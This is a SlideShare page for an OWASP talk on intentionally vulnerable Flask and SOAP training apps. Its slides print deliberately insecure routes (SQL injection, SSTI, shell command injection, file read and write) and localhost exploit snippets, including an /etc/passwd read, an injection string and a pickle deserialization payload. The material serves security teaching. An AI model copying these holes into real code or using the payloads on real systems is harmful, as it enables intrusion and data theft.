SlideShare a Scribd company logo

OWASP-VulnerableFlaskApp

A
anilyelken

OWASP - Vulnerable Flask App

Technology
1 of 34
Download to read offline
OWASP – Vulnerable Flask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP SQL INJECTION
OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
OWASP – VULNERABLE FLASK APP HTML INJECTION
OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
OWASP – VULNERABLE FLASK APP SSTI
OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
OWASP – VULNERABLE FLASK APP COMMAND INJECTION
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP LFI
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
OWASP – VULNERABLE FLASK APP BRUTE FORCE
OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
OWASP – VULNERABLE FLASK APP FILE UPLOAD
OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
OWASP – VULNERABLE FLASK APP DOS
OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
OWASP – VULNERABLE FLASK APP
VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken

Recommended

Sql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap KullanımıSql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap KullanımıBGA Cyber Security
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizBGA Cyber Security
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Yeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma YöntemleriYeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
petit cours sur la sécurité des réseaux informatiques
petit cours sur la sécurité des réseaux informatiques petit cours sur la sécurité des réseaux informatiques
petit cours sur la sécurité des réseaux informatiques Manuel Cédric EBODE MBALLA
 
Ofansif ve Defansif Powershell
Ofansif ve Defansif PowershellOfansif ve Defansif Powershell
Ofansif ve Defansif PowershellBGA Cyber Security
 

Recommended

Sql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap KullanımıSql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap KullanımıBGA Cyber Security
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizBGA Cyber Security
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Yeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma YöntemleriYeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
petit cours sur la sécurité des réseaux informatiques
petit cours sur la sécurité des réseaux informatiques petit cours sur la sécurité des réseaux informatiques
petit cours sur la sécurité des réseaux informatiques Manuel Cédric EBODE MBALLA
 
Ofansif ve Defansif Powershell
Ofansif ve Defansif PowershellOfansif ve Defansif Powershell
Ofansif ve Defansif PowershellBGA Cyber Security
 
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakBGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonBGA Cyber Security
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA Cyber Security
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMBGA Cyber Security
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsJimmy Guerrero
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Fwdays
 

More Related Content

What's hot

Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakBGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonBGA Cyber Security
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA Cyber Security
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMBGA Cyber Security
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 

What's hot (20)

Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat Sheet
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 

Similar to OWASP-VulnerableFlaskApp

Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsJimmy Guerrero
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Fwdays
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascriptEldar Djafarov
 
NodeJs
NodeJsNodeJs
NodeJsdizabl
 
Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots DeepAnshu Sharma
 
Dpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsDpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsKritika Phulli
 
Source Code for Dpilot
Source Code for Dpilot Source Code for Dpilot
Source Code for Dpilot Nidhi Chauhan
 
Flask & Flask-restx
Flask & Flask-restxFlask & Flask-restx
Flask & Flask-restxammaraslam18
 
Angular&node js upload file
Angular&node js upload fileAngular&node js upload file
Angular&node js upload fileHu Kenneth
 
Flask patterns
Flask patternsFlask patterns
Flask patternsit-people
 
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Python Google Cloud Function with CORS
Python Google Cloud Function with CORSPython Google Cloud Function with CORS
Python Google Cloud Function with CORSRapidValue
 
Express Presentation
Express PresentationExpress Presentation
Express Presentationaaronheckmann
 
Filling the flask
Filling the flaskFilling the flask
Filling the flaskJason Myers
 
Laravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel Poland MeetUp
 

Similar to OWASP-VulnerableFlaskApp (20)

Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIs
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"
 
URLProtocol
URLProtocolURLProtocol
URLProtocol
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascript
 
NodeJs
NodeJsNodeJs
NodeJs
 
Deep dive into new ASP.NET MVC 4 Features
Deep dive into new ASP.NET MVC 4 Features Deep dive into new ASP.NET MVC 4 Features
Deep dive into new ASP.NET MVC 4 Features
 
Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots
 
Dpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsDpilot - Source Code with Snapshots
Dpilot - Source Code with Snapshots
 
Source Code for Dpilot
Source Code for Dpilot Source Code for Dpilot
Source Code for Dpilot
 
Flask & Flask-restx
Flask & Flask-restxFlask & Flask-restx
Flask & Flask-restx
 
Angular&node js upload file
Angular&node js upload fileAngular&node js upload file
Angular&node js upload file
 
Flask patterns
Flask patternsFlask patterns
Flask patterns
 
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
 
Python Google Cloud Function with CORS
Python Google Cloud Function with CORSPython Google Cloud Function with CORS
Python Google Cloud Function with CORS
 
Express Presentation
Express PresentationExpress Presentation
Express Presentation
 
Filling the flask
Filling the flaskFilling the flask
Filling the flask
 
7. Lower upper in Laravel
7. Lower upper in Laravel7. Lower upper in Laravel
7. Lower upper in Laravel
 
Frontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and HowFrontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and How
 
Laravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swagger
 

Recently uploaded

Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfOverkill Security
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
